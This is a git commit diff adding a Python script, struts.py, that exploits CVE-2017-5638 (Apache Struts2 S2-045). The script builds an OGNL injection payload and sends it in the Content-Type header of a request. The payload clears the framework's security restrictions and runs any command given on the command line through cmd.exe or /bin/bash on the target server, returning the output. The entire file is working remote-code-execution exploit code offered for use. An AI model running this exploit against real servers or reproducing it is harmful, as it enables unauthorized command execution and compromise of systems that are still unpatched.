commit 6e345f6dbf40309e7f0b24dea469fb054c70f835 Author: Aljaz Ceru Date: Sat Mar 11 10:40:41 2017 +0100 ignore ssl warnings diff --git a/struts.py b/struts.py new file mode 100644 index 0000000..61b7edf --- /dev/null +++ b/struts.py @@ -0,0 +1,47 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- + +import urllib2 +import httplib + + +def exploit(url, cmd): + payload = "%{(#_='multipart/form-data')." + payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." + payload += "(#_memberAccess?" + payload += "(#_memberAccess=#dm):" + payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." + payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." + payload += "(#ognlUtil.getExcludedPackageNames().clear())." + payload += "(#ognlUtil.getExcludedClasses().clear())." + payload += "(#context.setMemberAccess(#dm))))." + payload += "(#cmd='%s')." % cmd + payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." + payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." + payload += "(#p=new java.lang.ProcessBuilder(#cmds))." + payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." + payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." + payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." + payload += "(#ros.flush())}" + + try: + headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} + request = urllib2.Request(url, headers=headers) + page = urllib2.urlopen(request).read() + except httplib.IncompleteRead, e: + page = e.partial + + print(page) + return page + + +if __name__ == '__main__': + import sys + if len(sys.argv) != 3: + print("[*] struts2_S2-045.py ") + else: + print('[*] CVE: 2017-5638 - Apache Struts2 S2-045') + url = sys.argv[1] + cmd = sys.argv[2] + print("[*] cmd: %s\n" % cmd) + exploit(url, cmd) \ No newline at end of file